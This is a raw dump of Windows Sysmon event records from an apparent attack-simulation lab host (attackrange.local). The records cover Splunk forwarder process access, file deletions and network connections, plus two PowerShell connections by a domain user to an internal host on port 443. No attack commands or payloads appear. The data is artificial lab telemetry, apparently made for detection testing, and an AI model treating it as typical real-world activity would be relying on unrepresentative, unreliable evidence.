Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DC0418501F32871696FAA14F0CBE658,SHA256=7AB03472EDDC5ABDB2FA45C0C4E3EB2734794D084ED640B41251A1483AC2A29F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127200Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:49.305{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61996-false10.0.1.12-8000- 10341000x800000000000000035127212Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:26.972{B81B27B7-821A-613A-A396-03000000C801}49484980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035127211Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:26.941{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F32FD74EB389AD3252A6E5FBEC72C4EF,SHA256=1CF4669EF8BF09ABA3FF003806543B97F25C403676F8CB75B0D3A0DEA206074A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127210Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:26.841{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-821A-613A-A396-03000000C801}4948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127209Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:26.841{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127208Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:26.841{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127207Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:26.841{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127206Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:26.841{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127205Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:26.841{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-821A-613A-A396-03000000C801}4948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127204Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:26.841{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-821A-613A-A396-03000000C801}4948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127203Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:26.826{B81B27B7-821A-613A-A396-03000000C801}4948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127202Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:26.707{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F3ECCE0871E11D76D6FC961D274E09A9,SHA256=4C5F6F2828F9FA97DF91C0805769EBFF36FF1211954BAEFF9DCFC87DBC5FF47B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127224Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:27.971{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=426CD0D2929A03A4827BE4107B7621E2,SHA256=01E508C9646EEC890392FA5F5D2E11668BEDEFB3934E9C6EAF4242B46793A700,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127223Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:27.840{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7ECEC61657EF4B97CCFDB91B6FF61F16,SHA256=D3805AC0B33E11D30B86B9EA93818C10B975AB7075A920151FE5B4BE37CD9256,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127222Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:27.840{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0CC6DB7D5148CAB59D6BF9CCF736F9E0,SHA256=A73E8EFF92BC145E3C3A9ED9C791D0EC8499D51B981624DB4F15F00B3F349A21,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127221Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:51.856{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61997-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035127220Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:27.540{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-821B-613A-A496-03000000C801}488C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127219Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:27.540{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127218Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:27.540{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127217Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:27.540{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127216Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:27.540{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127215Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:27.540{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-821B-613A-A496-03000000C801}488C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127214Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:27.540{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-821B-613A-A496-03000000C801}488C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127213Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:27.525{B81B27B7-821B-613A-A496-03000000C801}488C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127225Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:28.986{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=546DE5E778B631D292D4BB5654B600C9,SHA256=3F97D23E850B7D3626B4737079B07A2DAB61C72B5170395599876D189DCE37CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127226Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:54.317{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61998-false10.0.1.12-8000- 23542300x800000000000000035127227Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:30.004{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47DF501BE93BD6B31D2F2805D9D1A93E,SHA256=EADE236D8A9844181AB1CADEF7EEE3EA89BC2F3A2FB481CC7385DAAE1C0F6EE2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127228Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:31.023{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=711D66106C32C9B3C93DA1226F1E89BC,SHA256=3965FF033AC285FD781974F62F9857797459091D648EA3F0D19DFC5A787BEDD5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127230Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:32.704{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DCDD7D4A3591A8BC8ABA241F7F51D589,SHA256=08908444D22C7A4E577AEB89BEE944D9CF2C1C887442D9C844769E97D6CC84DF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127229Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:32.039{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7BD8DAD3A03EFD3ABA8E9AAA1D6DE90,SHA256=2F0BF7C0BB46514551D78DC5F73DA9D65F85CAF28C1484AC65503037567FEDD6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127235Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:57.864{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61999-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035127234Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:33.069{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127233Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:33.069{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127232Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:33.069{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035127231Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:33.053{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C14CCEC835579C3F2EC42B3A4206784D,SHA256=F35181C1D2938B358BD6782AC55EF0B094ED4B8D3C31665C61C277C6E9A35AB5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 